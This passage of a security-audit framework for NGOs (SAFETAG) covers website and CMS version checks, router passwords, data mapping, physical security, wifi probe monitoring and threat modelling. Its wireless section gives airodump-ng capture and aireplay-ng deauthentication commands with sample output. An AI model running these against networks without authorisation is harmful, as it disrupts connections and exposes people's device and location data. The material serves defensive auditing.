HTTPS / SSL – this comes at a cost, both the SSL Certificate and often an upgrade to the hosting plan itself. However, without SSL, every password – including the one used for admin access to the website – goes across the Internet in the clear. This is immediately available to a state-level actor through the ISP, and can also be sniffed if accessed by a staff member on a shared wifi connection (at a coffeeshop or airport), and finally if the attacker has broken in to the office network (see the Local Access section). Enabling SSL (and making it the default for your site) also protects the users of your site.

If an organization updates their website via FTP, it is worth noting that FTP is similarly insecure. Many hosting providers provide SFTP or FTPS, (two different, but secure, FTP versions), or secure WebDAV to upload files. These should be used, turning “plain” FTP off altogether if possible.

When switching to SSL/Secure FTP after having used the plain versions, webmasters should also update all administrative passwords, and watch to make sure that no step along the way (hosting provider management/panel, file upload, CMS editing) goes over “clear” channels.

Check for common website vulnerabilities

Summary

Content management systems require ongoing maintenance and updates to stay secure. Quite often these (or specific plugins) fall out of date and become increasingly vulnerable to automated as well as targeted attacks.

Overview
Materials Needed
Considerations
Walkthrough

Before unleashing more advanced and powerful tools like OpenVAS, a few quick steps can help better guide your work. As a general note, surfing using a browser with at least NoScript enabled may help not only protect you, but may also help to reveal malware or adware infecting the websites.

Record core details about the website - determine the hosting provider, platform, Content Management Systems, and other baseline data. BuiltWith is a great tool. There are a few alternatives, including an open source tool, SiteLab. Note that BuiltWith is a tool bundled in recon-ng, but the output it provides is not currently stored in its data structures. These tools may also reveal plugins, javascript libraries, and DDoS protection systems like CloudFlare.

Especially for CMS systems, out of date components can mean well-known and easy to exploit by malicious actors. The publicly-accessible CHANGELOG file at http://www.sampleorg.org/CHANGELOG.txt reveals an out of date, and security-compromised (https://drupal.org/SA-CORE-2012-004), version of Drupal. Upgrade immediately.

Drupal 6.27, 2012-12-19
----------------------
- Fixed security issues (multiple vulnerabilities), see SA-CORE-2012-004.
Drupal 6.26, 2012-05-02
----------------------
- Fixed a small number of bugs.
- Made code documentation improvements.

For Drupal, try visiting /CHANGELOG.txt , which, if not manually removed, will reveal the most recent version of Drupal installed on the server. Other telltale signs depend on the specific Drupal release; http://corporate.adulmec.ro/blog/2010/drupal-detection-test-site-running-drupal maintains a detection tool.

For Joomla, default templates provide strong hints towards versions based on copyright dates. Specific versions can often be discovered using this guide: https://www.gavick.com/magazine/how-to-check-the-version-of-joomla.html

Wordpress sites tend to advertise their version number in the header of each webpage, such as

<meta name="generator" content="WordPress 3.3.1" />

There is a web-based tool with browser add-ons available here: http://www.whitefirdesign.com/tools/wordpress-version-check.html

For other CMS systems, try BuiltWith (http://builtwith.com)

Recommendation

Most popular CMS platforms provide emailed alerts and semi-automated ways to update their software. Make sure someone responsible for the website is either receiving these emails or checking regularly for available updates. Security updates should be applied immediately. It is a best practice however to have a “test” site where you can first deploy any CMS update before attempting it on a production site.

For custom CMS systems, it is strongly advisable to migrate to a more standard, open source system.

An increasingly good practice is for organizations to take advantage of the "free" tiers of DDoS mitigation services, of which CloudFlare is probably the best known. A challenge of these free services can be that they have definite limits to their protection. With CloudFlare, organizations can request to be a part of their Project Galileo program to support at-risk sites even beyond their normal scope of support.

A community-based, open source alternative is Deflect, which is completely free for eligible sites.

Some of these services will be revealed by BuiltWith, but checking the HTTP Response Headers (in Chromium/Chrome, available under the Inspect Element tool, or by using Firebug in Firefox. See Deflect's wiki for more information.

Guide for NGOs about DDoS: Digital First Aid Kit

Explore Vulnerability Databases

Vulnerability Research

Summary
Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Examine Service Configuration Files

Activity Title

Summary

Examine configuration files for vulnerabilities using "hardening", or "common mistake" guides found online.

Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Network Vulnerabilities

See the Network Access and Mapping activities for methods to expose insecure wireless networks and for methods to use network mapping and traffic analysis to discover further potential vulnerabilities or points to investigate.

Penetrating Wireless Routers

Router Based Attacks

Summary

Many wireless routers still use the default password listed in “Router Default Password Search”, meaning that anyone with access to the network could also take complete control of the router - adding in remote access tools or setting up other attacks.

Overview
Materials Needed
Considerations
Walkthrough
Material that may be Useful:
Recommendation

Change Default Router Passwords

Passwords - particularly on core network devices - is very important. Use a password manager to save the new password (or be prepared to reset the router to a factory default).

While nominally "inside the firewall" and protected from remote attacks, leaving routers with default passwords, particularly wireless routers whose networks are often shared with visitors, is a potentially very high risk for an organization. Anyone who has gained access to the network via legitimate or other means could subtly alter the router's configuration to provide remote access, or route traffic to an attacker-designated server. Such changes can easily go undetected for long periods of time.

A common fear is forgetting the new router password. A password management system is an obvious solution, but if the router is in a secure location, even a stickie note would be better than the default password.

Data Assessment

Summary

This component allows the auditor to identify what sensitive data exists for the organization, where it is stored, and how it is transferred.

Purpose

Sensitive files are often stored across multiple devices with different levels of security. A data assessment allows the auditor to recommend secure storage solutions which best meet the organizations risk assessment and workflow needs. While the auditor has insight on some of this based on the Network Access and Network Mapping work, cross-staff understanding and agreement on what constitutes sensitive data will support later organizational change.

An adversary who obtains a laptop, workstation, or backup drive will be able to read or modify sensitive information on the device, even if that staff member has set a strong account password. This applies to threats involving loss, theft, and confiscation, but also to "checkpoint" scenarios in which they may only have access for a few minutes. Furthermore, in the event of a burglary or office raid, an adversary could obtain all sensitive information on the organization's devices, possibly even undetected.

The Flow Of Information

Data Assessment Information Flow
Data Assessment Information Flow

Guiding Questions

Approaches

If it was not possible to conduct these activities in person, you can conduct them remotely through applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Outputs

Operational Security

Preparation

Resources

Activities

Sensitive Data

Summary

Data and meta-data about an organization and its staff is incredibly difficult to keep track of over time, as people or projects use cloud services like Dropbox or Google Drive for some activities, a shared server for others, and a mix of work and personal devices (laptops, phones, tablets...).

This is natural, but it is important to keep track of where your organization's data lives and who can access it.

Overview
Materials Needed
Considerations
Walkthrough

Sensitive Data Assessment Activity

Duration: 45 minutes

This exercise is adapted from the LevelUp Activity, Backup Matrix, part of the curricula for Data Retrention and Backup by Daniel O'Clunaigh, Ali Ravi, Samir Nassar, and Carol.

Materials to Prepare:
Relative Sensitivity Computer USB / External Drive Cloud Storage Phones, Print, etc.
High
Moderate
Low

Explain to participants that we're going to conduct an information mapping activity to get a sense of where our important information actually is.

Start by listing the different places where our information is stored, according to participants. If no suggestions are forthcoming, we can prompt participants with the obvious stuff:

Use large stickies to place these as column headers on a wall. More will come up later in the course of the exercise.

Elicit from participants what type of information or data they have in each of these places. For example:

To encourage participant interaction, write one example on a sticky and place it in the appropriate box in the matrix. Then, ask whether there is another copy of this data somewhere. If there is, you can use another sticky and put it wherever they keep the duplicate.

TIP: Place Computers, Phones, and Email next to each other, so you won't have to create duplicates for everything "stored" in email (and therefore on laptops and phones)

Introduce a new vertical axis representing sensitivity. The higher on the chart, the more sensitive the data. Ask the participants to rank data.

For a large group, divide the group into smaller teams for the next steps (it helps if there are relatively clear thematic distinctions within the group, such as nationality, type of work, area of interest, etc.)

Provide stickies to the group(s). Have the group(s) brainstorm about all of the data they work with, focusing on the most important data first.

Participants should write ONE type per sticky, and create duplicates if the data is stored in multiple locations.

For a small group, this can be done as a "live" brainstorm. For larger groups that have been subdivided, have each group finish listing out their most important data and then have each group place the stickies on the matrix. Invite discussions around the sensitivity of the data.

An example may look something like this:

Level Up Backup Matrix Example
Level Up Backup Matrix Example

Explain that this gives us an idea of where our data is. Elicit whether or not this is all the data we generate? Of course it isn't: It's only a small percentage.

The LevelUp lesson uses this primarily to discuss the importance of backups, and this is a valuable point to make.

Call out the information that they are keeping on their computer's hard drive (which will usually be the fullest one). Elicit some of the things that can cause a computer to stop working. Maybe take a show of hands: Who has had this happen to them?

For SAFETAG, we focus on the "Sensitive data in the wrong hands" section. Based on the clustering of sensitive data along the vertical access, choose a column that has an unsual amount of sensitive data (email or computers, usually).

Remove the stickies from the column but keep them in your hand and read them. Now I have this information. What can I do with it? And what are you left with? Is anyone at risk - yourselves? partners? If this were published on the Internet, what would happen?

Recommendation

Risks of Data Lost and Found

Summary

Have staff rank the impact if different data within the organization was lost, and the impact if various adversaries gained access to that data.

Overview
Materials Needed
Considerations
Walkthrough

See the Sensitive Data activity for an interactive way to gather the types of data in the organization for this ranking exercise.

Recommendation

Private Data

Summary

Guide staff through an activity to have them list private data within the organization (e.g. Using the "personal information to keep private" handout. 66)

Overview
Materials Needed
Considerations
Walkthrough

Personal Information To Keep Private

Information that can be used to identify individuals, organizations, and even communities of practice should be treated with the utmost care. Some data, like names, phone numbers, and addresses are obvious, while others, like computer names, the MAC addresses of wifi cards, or pseudonymous social media accounts may be less obvious. Also, combinations of information - location, data, and type of activity, or even an issue area of interest and a city name may specify a very small number of activists or organizations.

This spreadsheet, part of the Responsible Data Forum documentation sprint provides a useful baseline of types of data and ways to manage or obfsucate it usefully: Data Anonymization Checklist

Recommendation

For the internal audit report back to the organization, much of the information will require specific identification of user devices (and by extension, their users), as well as very sensitive organizational data. None of this data, by intention, accident, or adversarial action, should be shared with third parties.

Please refer to the Analysis and Reporting section for the limited data set that is required for project reporting, and to the Operational Security section for guidance on data security.

Physical and Operational Security

Summary

The organizational security methodology is focused on how to mitigate against threats that occur because of the arrangement of digital assets in the physical world -- how secure are the devices at an organization's office, where and how staff travel with organizational devices, and whether staff work outside of the office (e.g. in remote offices, at their homes, while traveling, or at cafes). Further, is organizational information accessed from personal devices, and how are those devices secured?

Purpose

While the SAFETAG framework is focused on the security of data, the physicality of devices, backup drives, servers, and even hard-wired networks cannot be overlooked.

For many organizations, digital threats that depend on physical access are considered the least probable. So much so, that many security specialists concede that there is no proper defense against an attacker with physical access to sensitive hardware. While there is some truth to this, it is not useful advice for small scale civil society organizations or independent media houses. The risks that advocacy and media organizations face are far more varied, and the cost of lost information can be crippling to their ability to operate. As such, these risks have high severity, despite their equally high probability for these organizations.

Depending on the specific threats for each organization, the auditor should consider the challenges of not only one-time exfiltration of data as well as potential ways an adversary could use physical access or proximity to the organization or its devices to gain ongoing remote access, track, or cause harm to the organization through the outright destruction of data.

The Flow Of Information

Data Assessment Information Flow
Data Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Activities

Guided Tour

Summary

During this component an auditor tours the audit location(s) and flags potential risks related to physical access at that location.

Overview

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

This can be done remotely via secure videoconference over a smartphone or tablet that can moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

Materials Needed
Considerations
Walkthrough

As part of your first day, have your point of contact walk you around the office - this is primarily a chance to understand the office layout and meet the rest of the staff, but take mental note of the devices in use and laying out on desks as you walk around the office. Note as well the location and access to components such as servers and networking components. Taking actual notes may make the staff feel that you are judging them, especially if this is your first interaction -- refrain from this, and if needed, also consider a more "neutral" note-taking process by integrating the Office Mapping activity.

If the auditor is unable to go to the office (or can only visit one of multiple offices), consider having the point of contact use a video call. You will want to have the entire staff be aware of this activity and know the person who is walking around the office. This requires sufficient bandwidth (and unmetered or low-cost) for a 1-hour video call. This could be scheduled for before or after office hours to both discover how devices are left overnight as well as reducing the impact on the network.

Similarly, the in-person tour can also be done outside of normal business hours. Please note: this can damage the trust the staff has in the auditor, as well as unintentionally embarrassing specific staff members in the eyes of the point of contact. It is not recommended to do this except for organizations who have already received training and worked on improving their physical/operational security practices and face an active adversary. This could be before the staff arrives in the morning, during lunch, or after hours (perhaps have dinner with your point of contact, and come back to check the organization afterwards). This gives a clearer picture of how devices are secured outside of the work day (are desktops and laptops unsecured, still on, logged in?). Are backup drives or other storage media easily accessible? Are doors to server rooms/closets locked? Are keys to these locked cabinets/rooms visible?

Recommendation

Office Equipment is unsecured against burglary

Unsecured physical network components and devices such as computers, servers, and external drives present a risk of sensitive data loss through theft, seizure, and malicious interference. Access to network compontents and servers should be limited and devices should be secured when not in use.

In the event of a burglary or office raid, an attacker could easily obtain sensitive information from devices without encryption, external hard drives, and other easily accessible items. An advanced attacker could compromise the network for later surveillance.

Secure Devices

Lock in desks or via security cables all easily portable items

Any device which connects to the organization's digital assets (and therefore has passwords or cached data) or stores organizational data (including backup drives, laptops, desktops, cameras, other storage media), should be secured (ideally out of sight, such as in a locked cabinet or desk drawer) when not in use to prevent theft and discourage seizure.

Follow the Device Assessment guidelines on drive encryption.

Encrypted drives offer the best protection against data loss from stolen or seized devices. Follow the recommendations of the Device Assessment section, paying specific attention to the need for strong passwords, automatic locking of logged-in accounts, and the importance of turning a machine off to fully benefit from drive encryption.

Place core network components and servers in a locked space.

Direct access to servers and network components such as routers, cablemodems, patch panels and switches provides an adversary multiple ways to extract sensitive information and cause extensive, yet hard to detect, damage. Ensuring that not only are these physically protected, but that there are organizational policies around which staff have access to them is critical - a locked cabinet that always has the key in the lock does not provide security. If a particular component needs, for example, regular rebooting, creative solutions should be found to balance security and staff needs.

De-activate unused network ports

Hard-wired network ports tend to connect directly into the most trusted parts of a network. De-activating any that are in public areas of the office (front desk, conference rooms, break rooms), as well as any that are not needed is recommended.

Operational Security Survey

Summary

This activity helps the auditor assess the organization's current operational security policies and practices through in-person or remote surveys and/or interviews. By also requesting to review and official policies as well as conducting multiple iterations of this with different staff members, some basic verification of the practices and awareness/understanding of existing policies can be achieved

Overview

The auditor interviews and/or requests survey input from organizational representatives, requests supporting documentation (e.g. policies) as relevant, and iterates/repeats as needed.

This activity is used to solidify the auditor's understanding of the physical risks the organization faces in its work as they impact information security:

This can be done entirely remotely over secure communications channels (see operational security considerations), and may be useful to be done partially or fully in advance of an in-person audit to further understand operational risks of traveling to the office location.

Materials Needed
Considerations
Walkthrough

This activity should build on the preparation work of the auditor, as well as the capacity assessment and context research work:

Once an initial interview or survey has taken place (as part of capacity assessment or dedicated to the above-mentioned questions), Send a follow-up request for any policies mentioned or referred to (travel policies, onboarding/offboarding policies for staff changes, personal device usage ("BYOD") policies, etc.). After reviewing those documents, request any additional policies those may refer to (general IT or security policies), and/or schedule a follow up interview or informal survey to dig deeper into remaining unanswered questions on the operatioal security situation of the organization as well as their adaptations to it. In the (likely) case where there are no policies governing these topics, the auditor can ask their points of contact for these discussions what the general practices are and expand and verify this through additional activities.

In creating new questions, be careful to not "lead" on security in a way that would discourage honest and transparent responses. For example, ask "Do you host community events and trainings?" instead of "Do you allow outside people into your office"?

Below are questions not already covered in the capacity assessment interview process, and after that selected questions from that process which are of particular use here.

Office layout and access

Has the organization dealt with robberies/theft, break-ins, or office raids? If so, what happened, when, and how did you respond (or do you have a policy or contingency plan? When was that last reviewed/updated?)

Who has independent access to the office space, and routine after-hours access (i.e. who is able to unlock the space). This may include security, cleaning or other building service personnel.

Programs and staff

Selected questions from the Capacity Assessment Interview, "Open Up" section:

From "Threat Information"

From the Technical Only section:

Recommendation

See recommendation section in the Guided Tour activity.

For useful organizational policy recommendations, review the SANS Information Security Policy Templates

Office Mapping

Summary

This activity seeks to identify potential physical vulnerabilities to an organization's information security practices by documenting the current physical layout of the office and the locations of key assets, as well as potential "external" risks such as nearby/shared office spaces.

This can be done in person independently or alongside the "Guided Tour" activity, and can also be done in advance of an assessment or remotely by a willing staff member who knows where these assets are located (often a technical or administrative staff person). This can also be conducted in a multi-office or home-office environment where the auditor is unable to visit every location.

Overview

In this activity, the auditor or the organization draws a map of the office space and notes locations of potentially valuable information or assets.

This activity can be paired with the Guided Tour activity, to reduce the awkwardness of taking notes while walking around the office during the Tour, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each. This can also be done by an organizational point of contact in advance to provide additional preparation for the auditor.

Materials Needed
Considerations
Walkthrough

Walk around the office and draw a map of the floor-plan (do not rely upon memory). Consider taking photos of specific areas (e.g. confusing layouts or areas difficult to capture in drawing). Make notes of where intruders could gain access to the office, where sensitive data may live (in the executive director's desk, in a storage closet, on devices), and relevant other items. Also note the overall privacy that the office provides (is it a shared office space, shared building, etc.)

Note the locations of any of the following that apply:

If doing this activity remotely and/or in advance of an audit, it may be useful to have multiple staff members independently draw maps and to provide the organization with additional guiding questions:

Recommendation

See recommendation section in the Guided Tour activity.

Scavenger Hunt

Summary

This activity assists in identifying potential physical security concerns at an organization, particularly when an auditor cannot travel to the office location or cannot visit every office location. The scavenger hunt approach is focused on involving the organization staff members into mapping out potential threats based on the abstraction and the gamification of the physical security mapping process. See the "Risk Hunting" exercise in SaferJourno, page 19, for additional ideas and guidance on conducting this activity.

Overview

A local facilitator is required to lead this "scavenger hunt" where staff members seek out potential physical security challenges themselves. This activity should only be conducted within an environment with a high level of trust and consent. The auditor should get the agreement from the host NGO to involve all staff members into the exercise to avoid causing trust issues. By involving the staff members in identifying physical security risks, you are also taking a step forward to increase awareness on these issues.

With facilitation, staff members will explore their own office looking for potential physical security risks and share results. To reduce the risk of individual staff embarrassment, they will first review their own working space and secure it before looking around other parts of the office. The facilitator, in consultation with the auditor and the organizational point of contact may declare some areas "off limits"

Materials Needed
Considerations
Walkthrough

The auditor should first meet with the facilitator (possibly over secure videochat) to brief them on the activity and map out potential challenges (particularly around trust, organizational hierarchies, and any potential repercussions).

The auditor then prepares a checklist of physical vulnerabilities with the facilitator, based on the current understanding of the organization's assets and the context they are operating within. The auditor, facilitator, and organization point of contact should decide if any areas are "off limits." Note that this is only a list of a suggestions. As with the "Risk Hunting" exercise in SaferJourno, and it should be modified to fit the requirements, assets, and threats the organization faces:

At the organization, the facilitator explains the activity to the organization members. To balance the need for consent with the benefits of identifying actual daily practices which may need improvement, the staff should already be aware that examining physical devices is part of the audit scope, but not the specific activity. Staff will be able to first identify and address their personal concerns before others.

Recommendation

(See "Guided Tour")

Monitor Open Wireless Traffic

Summary

It can be valuable to to listen to broadcast wireless traffic at the physical office location, even before knowing anything about the organization's network itself. This outside, passive information gathering can reveal a surprising amount of data on not only what devices are connecting to which networks, but also what type of devices they are (based on their unique MAC addresses), and what other networks those devices have historically connected to. These probes can reveal personal, organizational, locational, and device information that, taken in context, can be dangerous or lead to other vulnerabilities.

Overview

Each wireless device maintains a "memory" of what networks it has successfully connected to. When it is connecting to a network, it sends out "probes" to all of the networks it has in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with to their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

Materials Needed
Considerations
Walkthrough
Step 1: Monitor Mode

You should disconnect from any wifi network you may be connected to to capture the widest amount of data.

Switch your wireless adapter to monitor mode**

$ airmon-ng start <interface>

You may need to stop your network manager system to prevent it from interfering. Running

$ airmon-ng check

to list anything that is causing problems, and

$ airmon-ng check kill

to try and stop them automatically, and running stop network-manager && stop avahi-daemon may keep them from re-starting automatically.

Step 2: Listen for wifi probes.

Run airodump-ng on the monitor mode interface (usually mon0). This listens to wifi beacons and you can begin analyzing who is on what network, and see historical networks.

airodump-ng -w filename mon0

This scans all networks and channels, collecting broadcast network information. Note that, despite its broadcast nature, this is privacy invasive and can be considered illegal: http://www.slate.com/blogs/future_tense/2013/09/16/google_street_view_wi_fi_snooping_case_good_news_and_bad_news.html . You can restict this to a specific channel or base station ID (BSSID) with -c and --bssid:

airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w filename mon0

Step 3: de-auth (optional)

Send de-authentication packets to force clients to reconnect and send out additional probes. Take note that by its very nature, de-authentication causes annoying interruptions to wifi traffic. This breaks connections, drops skype calls, and can make the wireless network temporarily unusable -- Make sure to check with staff before going through this (to make sure no one is doing a live webcast or on an important VOIP call, and to expect some network instability).

$ aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0

 15:54:48  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
 15:54:49  Sending 64 directed DeAuth. STMAC: [AA:BB:CC:DD:EE:FF] [ 5| 3 ACKs]

This command de-authenticates one targeted user with one attempted deauth packet. "-0 10" would try 10 times (potentially disconnecting the user multiple times!). With permission, you can also target all users on a network by leaving out the "-c ..." flag.

There are scripts, like wifijammer, which use this same approach to jam all wifi connections in range of the attacking computer, so check against the documentation at http://www.aircrack-ng.org and act responsibly to protect yourself and the organization.

Step 4: MAC Address Research

The first three hex numbers of each MAC address designate the vendor, which can reveal useful information in matching MAC addresses to devices. The MAC address is a unique identifier, so never post or search using the full address. Note that increasingly, devices are using MAC address randomization, but if it implemented, it often is poorly implemented against even minimally determined adversaries, as per this 2017 research study.

To compare found MAC addresses to the bendor database offline you can download the full vendor database from IEEE or use the Wireshark list

Step 4: Ongoing Monitoring

The longer you leave this running (particularly when staff are first entering the office or returning after lunch/meetings), the better sense of what devices are connected to the network you will get.

Watch what probes the various devices are sending out (especially when they are deauthenticated, as above). You will see each computer on the network, as identified by their mac addresses, broadcast information about previous networks to which they have connected.

BSSID              STATION            PWR   Rate    Lost    Frames Probe

00:11:22:33:44:55   0F:3E:DF:DA:2D:E2   -67 0   0   234567  SampleOrg,linksys¸John Smith's iPhone,Free Public Wifi
00:11:22:33:44:55   F8:7E:FC:03:CC:43   -80 -24 0   234567  amygreen,SampleOrg,android-hotspot,Starbucks,united_club,Dulles Airport WiFi
00:11:22:33:44:55   F8:19:F3:DF:75:19   -58 -54 0   234567  SampleOrg
00:11:22:33:44:55   38:08:95:EB:7E:0B   -75 -12 0   234567  HolidayInn,SampleOrg,John Smith's Mac mini,android-hotspot
Recommendation
Recommendation: Cleanse wifi network connection history

For most devices, deleting networks from the “saved” network list will stop them from being probed. Obviously, this can be an annoyance for networks you regularly connect to, so renaming these networks to non-revealing names would help, as would creating non-name-associated “guest” networks for colleagues connecting to your home network.

On iPhones and iPads, it is not possible to selectively remove historical networks unless you are currently in range of that network. It is however possible to remove all history: go to Settings > General > Reset > Reset Network Settings . When you take this step, it is worth going through this reset multiple times – approximately once per year of device ownership, as the first reset appears to only remove recently-connected networks, and older networks will be broadcast.

Recommendation: Use innocuous network names

Organizations may want to choose innocent or generic network names, and/or not broadcast network names. It is worth noting that devices seeking out hidden networks will "beacon" for the actual network name, so this has extremely limited security use and must be combined with other protective measures. See this Acrylic blog post for further details.

It is worth noting that wifi access points are also tracked to assist in location services, and as such the location of a wireless network can be learned from its name or the MAC address of the access point. WiGLE is a community-managed database for such information, but both Google and Microsoft, and likely many others, also track this locational information, so the opt-out information below is only minimally useful.

Removal options: See wikipedia for public listings. Some opt-out options exist below:

Wireless Range Mapping

Summary

This component allows the auditor to show the "visibility" of an organization's wireless network to determine how far the organization's wireless network extends beyond a controlled area. Wireless networks are often trusted as equivalent to the hardwired office networks they have largely replaced, but they have important differences. Wireless networks are often "visible" from outside the walls of the office - from common spaces or even the street. Without further access, this reveals a wealth of information about the organization's size and the type of devices connecting to their network.

Overview

This component consists of wireless scanning and wireless signal mapping. It is useful for organizations with offices in shared spaces/buildings/apartment complexes or near locations where an adversary could easily "listen" to network traffic. In conjuction with Monitoring Open Wireless Traffic exercise, it can also identify devices using that network. It is useful to do this in parallel with Office Mapping to build a more comprehensive view of the information assets of the organization.

Materials Needed
Considerations
Walkthrough

Map the range of the organizations wireless network outside of office space, using wifite or other tools to track network strength.

A variety of apps and tools can support this work without reosting to professional "wifi site survey" tools. If the Office Mapping exercise has taken place, that map can serve as the starting point to expand the map outside the office. If using a third party tool or app, ensure that the app is not sharing sensitive data. Using simple signal strength monitors in combination with location notes is more than sufficient. In Linux systems, one can use wavemon, kismet, wifite, and even the networkmanager command line tools to track visible networks and their strengths as described on StackExchange:

watch  "nmcli -f "CHAN,BARS,SIGNAL,SSID" d wifi list ifname wlx10feed21ae1d  | sort -n"
Recommendation

Depending on office layout, moving the wireless access point may help to reduce how far the network is transmitted outside of the office space, and changing devices which do not move to better enable this without loss of functionality.

See also Monitoring Open Wireless Traffic recommendations and Network Access security recommendations.

Process Mapping and Risk Modeling

Summary

This component allows an auditor to lead the host organization's staff in a series of activities to identify and prioritize the processes that are critical for the organization to carry out its work. These activities will also reveal the consequences if those critical processes were interrupted or exposed to a malicious actor. This results in the staff creating a risk matrix which is used as the foundation of the auditor's recommendations.

Purpose

Having the host organization central to the risk assessment process allows the auditor to put their threats and recommendations into the host's own narrative. With greater ownership of the process the staff will be more engaged in addressing the threats identified when the audit is complete. 67 By engaging as many staff as possible the auditor also is providing a framework for staff to examine future concerns when the auditor is gone. The existing in/formal security practices captured during this process will be used to remove organizational and psyco-social barriers to starting new practices.

The Flow of Information

Risk Modeling Information Flow
Risk Modeling Information Flow

Guiding Questions

Approaches

Note: Risk modeling will require a mixed approach of exercises, and the order which you identify each component will vary depending upon the organization.

If it was not possible to conduct these activities in person, you can conduct them remotely through applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Outputs

Operational Security

Preparation

Resources

Threat Modeling Resources (General)

Risk Assessment Activities

Threat Assessment Activities

Example text for introducing threats - Integrated Security

Written exercise: Threats assessment - Integrated Security

Facilitators Manual (With PDF download of "Threat Introduction Example Text" and "Threat Assessment Written Exercises") - Integrated Security

Analyzing Threats: Chapter 3 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Risk Matrix Activities

Risk Assessment: Chapter 2 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Alternative Risk Modeling Activities

Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Activities

Process Mapping

Summary

This activity helps to identify the processes that allow the organization to function (publishing, payment, fund-raising, outreach, interviewing) the assets and systems (websites, software, PayPal) they rely on, and which ones are critical to their work. (Activity)

Participants are asked to "brain-storm" a list of all the processes that are critical for their work and the auditor works to map the details of critical processes out to expose points of risk.

Overview

If it was not possible to conduct these activities in person, you can conduct them remotely through applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Materials Needed
Considerations
Walkthrough

The goal of this exercise is for the auditor to lead the host participants in "brain-storming" and mapping all the processes that are critical for the organization to carry out their work.

Additional Material

Getting Started

The auditor gives the participants a few example processes for a small independent media outlet.

Once the participants have brainstormed these out the facilitator leads the participants in identifying the critical processes (this may be all of the processes identified.)

The trainer then begins a free-hand process mapping activity for each process. You will be "charting the sequence of events of the work."

A Process Map shows

Conducting the Activity

NOTE: If an auditor does not ensure that the uniquely identified subset of processes speaks to the full range of participants, their recommendations are more likely to be met with resistance.

While doing this it is important to consider level of detail you will be mapping out (this should be pre-determined or established so everyone is on the same page)

How to make a process map

This process map will be used to develop our asset map.

"Draw the flowchart initially to represent the operation, as it actually happens - NOT what you might prefer it to be! Use a flip chart or whiteboard to produce your initial charts"

"WHO does WHAT (Job title/Function e.g. Level A1)
WHAT is done and WHEN
What DECISIONS have to be taken and
What possible paths follow from each decision"

Keep it simple to facilitate broad understanding of the OVERALL process. Too much detail early on can be overwhelming and/or lead to confusion. If you agree that more detail is required on a particular action, it is easy to highlight that box and produce a separate chart showing the process taking place within.

Recommendation
This activity can lead to feelings of hopelessness; it is important to remind the staff that any risk can be mitigated, and indeed it is the goal of an audit to identify the highest priority ones based on actual likelihood and provide guidance on mitigation.

Risk Modeling Using the Pre-Mortum Strategy

Summary

The pre-mortum strategy was devised to take participants out of a perspective of defending their plans and strategies and shielding themselves from flaws. They are given "a perspective where they [are] actively searching for flaws in their own plan." 68.

Overview
Materials Needed
Considerations
Walkthrough
Additional Material

Getting Started

Conducting the Activity

Pre-Mortum Strategy: (30 Minutes) The pre-mortum strategy was devised to take participants out of a perspective of defending their plans and strategies and shielding themselves from flaws. They are given "a perspective where they [are] actively searching for flaws in their own plan." 69

Process/Interaction Mapping (30 minutes per process):

Recommendation
This activity can lead to feelings of hopelessness as well as stir up direct fears or challenges that the staff face. It is important to remind the staff that any risk can be mitigated, and indeed it is the goal of an audit to identify the highest priority ones based on actual likelihood and provide guidance on mitigation.

Risk Matrix

Covered in full in Threat Identification:

Critical Data Activity

Covered in full in Data Assessment:

Threat Assessment

Summary

This objective uses a variety of activities to identify possible attackers and gather background information about the capability of those attackers to threaten the organization. This consists of identifying a particular attacker's history of carrying out specific threats, their capability to carry out those threats currently, and proof that the threat has intent to leverage resources against the target.

Purpose

Checking the assumptions both of the organization and of the auditor by researching the current threats will ensure that an auditor is basing their work on accurate assessments of the conditions the organization faces and that they are making informed operational security considerations. With greater ownership of the process the staff provides an opportunity to explore their threat landscape and become more engaged in addressing the threats identified when the audit is complete. By engaging with as many staff as possible the auditor is providing a framework for staff to explore threat identification processes when the auditor is gone.

The Flow Of Information

Threat Assessment Information Flow
Threat Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Threat Assessment Activities

Example text for introducing threats - Integrated Security

Written exercise: Threats assessment - Integrated Security

Facilitators Manual (With PDF download of "Threat Introduction Example Text" and "Threat Assessment Written Exercises") - Integrated Security

Analyzing Threats: Chapter 3 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Threat Modeling Resources (General)

Threat research by focus area

Threat research by method

General Threats by Region

Technical Threats

Targeted Malware
Censorship and Surveillance Reports

Travel Threats

Activities

Pre-Mortum Risk Modeling

Covered in full in Risk Assessment:

Critical Data Activity

Covered in full in Data Assessment:

Threat Identification

Summary

These activities build off of a process or data mapping exercise to connect actual processes or assets and data of the organization with potential threats, then drilling down into specific, likely threats the organization faces, adversaries who might take advantage of them, and the impact of this happening.

The goal is to be able to answer the following questions:

Threat History

Threat Capability

Threat Intent

Overview
Materials Needed
Considerations
Walkthrough

Threat Identification: (30 minutes per process)

Impact Identification: (30 minutes per process) This exercise has the trainee lead the participants on a brainstorming of hypothetical consequences (impacts) when the threats identified earlier occur.

Adversary Exploration (Likelyhood):

